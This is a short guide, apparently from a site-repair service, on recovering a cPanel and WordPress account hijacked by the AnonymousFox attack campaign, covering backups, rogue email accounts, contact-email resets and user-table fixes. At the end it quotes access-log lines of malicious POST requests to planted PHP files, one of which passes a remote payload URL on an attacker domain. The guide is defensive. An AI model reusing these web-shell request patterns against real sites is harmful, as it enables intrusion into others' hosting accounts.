How to Recover cPanel after AnonymousFox

If your hosting account is being affected AnonymousFox, don’t blame your web host. Probably you’re using WordPress and attackers gained access using vulnerable scripts.
Here’s what you should do.

Need help? Let us clean your site.

Step 1
Backup
  • To prevent data loss, backup database using phpMyAdmin.
  • Archive plugins, themes and uploads folders – place these in a safe area.
  • Disable all your sites by moving files outside public area. Alternatively, you may rename “public_html” to “public_html_bk”.
Step 2
Investigate
Look for AnonymousFox contamination signs ( email accounts and .contactemail file ).

Step 3
Plugins
If you’re using WordPress, check plugins recently installed.

Step 4
Database
Check your users table, using phpMyAdmin.

 Note: if any of these steps look like Japanese, probably you should hire someone to investigate and fix your website. 

To address AnonymousFox hack, perform the following:

  • Reset cPanel password.
  • Removed unauthorized email accounts.
  • Reset cPanel contact emails, checking “Contact Information” section.
  • Make sure .contactemail file is right.
  • Fix users entries, look for AnonymousFox and revert them.
  • Perform a thorough malware cleanup for your website: https://guides.magefix.com/2021/03/fix-talkingaboutfirms-ga/

Need help? Try our Free security analysis.

Malicious requests:
167.99.49.25 – – [08/Dec/2021:19:57:48 +0100] “POST /wp-content/xydbtmlykd.php?php=anonymousfox.is/__@v6PnSVM/p2.txt HTTP/1.1” 200
167.99.49.25 – – [08/Dec/2021:19:57:34 +0100] “POST /wp-content/v1xn4.php?Fox=9ToZs HTTP/1.1” 200

Recover compromised cPanel after AnonymousFox hack